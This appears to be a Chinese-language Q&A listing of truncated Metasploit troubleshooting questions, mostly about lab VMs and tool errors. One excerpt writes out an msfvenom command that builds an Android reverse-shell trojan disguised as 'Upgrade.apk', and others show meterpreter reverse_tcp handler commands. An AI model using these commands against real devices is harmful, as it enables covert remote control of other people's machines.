metasploit

将新模块放入 metasploit 框架(msf6)的过程是什么?
metasploit

将新模块放入 metasploit 框架(msf6)的过程是什么?

我感兴趣的是了解新模块或漏洞如何进入 Metasploit Framework?我可以看到新的印刷噩梦漏洞正在处理/完成,所以我对 Kali 进行了更新,但它没有出现。 可能是因为它还没有在 repo 中? 无论如何,我从 GitHub 页面复制了 ruby​​ 代码并将其添加到: /usr/share/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb 然后我启动了 msf6 和reload_all。 这是将新模块、有效载荷、漏洞利用等引入...

Admin

metasploit 是病毒吗?
metasploit

metasploit 是病毒吗?

当我从官方网站打开 metasploit exe 时,Windows 安全部门向我发送了“发现问题”通知,当我从实际 GitHub 查看标记为木马的文件时,我搜索了一个文件,发现它是一个 PowerShell。 事实上,这是官方网站,所以我认为它是安全的,并且在运行它和 VirusTotal 之前,我用 malwarebytes 和 Windows Defender 对其进行了扫描。 所以,我认为这是一个错误,Windows 安全部门认为它是一个特洛伊木马,因为它可能是制作特洛伊木马的代码。 那么为什么会发生这种情况?我该怎么办? 顺便说一句,之后我扫描了我...

Admin

我收到此 Metasploit 错误:“由于失败而中止漏洞利用:无目标:没有匹配的目标”
metasploit

我收到此 Metasploit 错误:“由于失败而中止漏洞利用:无目标:没有匹配的目标”

目前正在主机专用适配器上运行两个虚拟机以供练习,一个是 Kali Linux,另一个是 Microsoft Windows XP SP2。 我正尝试通过常见漏洞访问 Windows XP VM windows/smb/ms08_067_netapi,但一直收到错误。 “由于失败而中止漏洞利用:无目标:没有匹配的目标” 以下是我为了获得此信息所做的事情。 service postgresql start msfconsole nmap 192.168.56.101 (remember it's in a host-only adapter, not sur...

Admin

漏洞利用已完成但未创建会话
metasploit

漏洞利用已完成但未创建会话

我尝试使用 WSL 和 Kali 在我的 PC 上进行渗透测试,一切正常,直到在我的目标 PC 上创建并执行了有效负载,并恢复了会话。 完成第一步后,我得到: msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/re...

Admin

会话打开后,Metasploit 卡住了。Meterpreter 不显示
metasploit

会话打开后,Metasploit 卡住了。Meterpreter 不显示

我正在试验 Metasploit 并在自己的机器上使用它。 我在 VirtualBox 上运行 Kali Linux,并尝试打开到我的主机 Win 10 操作系统的 meterpeter 会话。 我生成一个reverse_tcp有效负载,在我的主机操作系统(Windows 10)上执行它,然后exploit/multi/handler在 Kali 中运行。 会话打开了,但是 meterpreter 没有出现,什么都没有发生。metasploit 卡在了这一点上: Metasplilt 此时卡住了 如果我尝试取消漏洞,Ctr+C我的整个机器就会冻结,我必须重新...

Admin

清除 Windows Defender 中我手动删除的项目的威胁/操作?
metasploit

清除 Windows Defender 中我手动删除的项目的威胁/操作?

背景 我使用的是 Windows 10(版本 10.0.18363 Build 18363)。我下载了 Metasploit,但没有安装(我是 CSA)。我忘了添加豁免,Windows Defender 自然解压并发现了 msi 包中的数百个漏洞。 我决定暂时使用 来从管理 Powershell 控制台中删除安装程序包-Force。看来安装程序已经被隔离了。 现在,即使经过另一次完整扫描,不再存在的威胁仍然会在 Defender 中显示为“待处理操作”: 我打开了每一个威胁,选择“删除”,然后点击“开始操作”(如下): 列表即刻消失了,似乎...

Admin

我可以在虚拟机内安装虚拟机吗?
metasploit

我可以在虚拟机内安装虚拟机吗?

我不擅长电脑。目前,我使用 Kali Linux 作为使用 VMware 的虚拟机。我想在此虚拟机内使用虚拟盒安装 Metasploitable2。我可以这样做吗? ...

Admin

Msfvenom 未选择 Arch,从 payload 中选择 arch: davlik
metasploit

Msfvenom 未选择 Arch,从 payload 中选择 arch: davlik

我正在运行一个命令来创建 Android 木马。命令是: msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST =192.168.0.104 LPORT=4444 R > /root/Desktop/Upgrade.apk 我得到的输出是: No Arch selected, selecting arch: davlik from payload No encoders or badchars specified, outputting raw payload....

Admin

如何将 ftp 连接到本地 ipv6 地址
metasploit

如何将 ftp 连接到本地 ipv6 地址

我正在尝试连接到我网络中的 ftp 服务器。我只有链接本地 ipv6 地址 (fe80::1:1:ff:f)。当我尝试通过 filezilla 连接时,出现错误“连接尝试失败,错误信息为“EINVAL - 传递的参数无效”。 使用命令行 ftp 工具我只收到“无效参数”错误。 我知道可以连接到 ftp 服务器,因为我使用 metasploit 的辅助/扫描仪/ftp/ftp_login 工具和我的凭据并且成功连接。 我尝试了 Filezilla、ftp、lftp、metasploit 工具。 ftp -6 [fe80::1:1:ff:f] 我希望...

Admin

ClamAV 和 Metasploit
metasploit

ClamAV 和 Metasploit

我使用命令 dnf remove metasploit-framework 删除了 Metasploit 框架,并使用 Clam AV 对我的 Linux 发行版进行了全面扫描,检测到 4 个受感染的文件: /var/cache/PackageKit/29/metadata/metasploit/repodata/6727fbd7ca119ba388385979b8a37 filelists.xml.gz:发现 Win.Trojan.Maljava-2 /var/cache/PackageKit/28/metadata/metasploit/repoda...

Admin

安装 Metasploit Community 后,MSFconsole 无法从终端启动
metasploit

安装 Metasploit Community 后,MSFconsole 无法从终端启动

MSFconsole 无法从终端启动。昨天它还能用。唯一改变的是,我安装了 Metasploit Community。 错误如下: Traceback (most recent call last): 34: from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.5.0/bin/msfconsole:23:in `<main>' 33: from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.5.0/bin/msfconsole:23...

Admin

与此主机匹配的指纹过多,无法提供特定的操作系统详细信息
metasploit

与此主机匹配的指纹过多,无法提供特定的操作系统详细信息

我在 Kali Linux 2 上使用 Armitage。(虚拟盒)在 Armitage 中,我使用“快速扫描(操作系统检测)”选项。这是输出日志: [*] Nmap: Nmap scan report for 192.168.1.255 [*] Nmap: Host is up (0.0089s latency). [*] Nmap: All 100 scanned ports on 192.168.1.255 are filtered [*] Nmap: Too many fingerprints match this host to give ...

Admin

ssh 连接上的 Meterpreter
metasploit

ssh 连接上的 Meterpreter

我在 NAT 后面。 我可以通过 ssh 登录到目标。 如何使用metasploit/meterpreter通过 SSH 连接发送? 我尝试过shell_to_meterpreter但是失败了因为我无法打开我的端口用于反向 TCP 连接。 两台机器都运行 Linux。 ...

Admin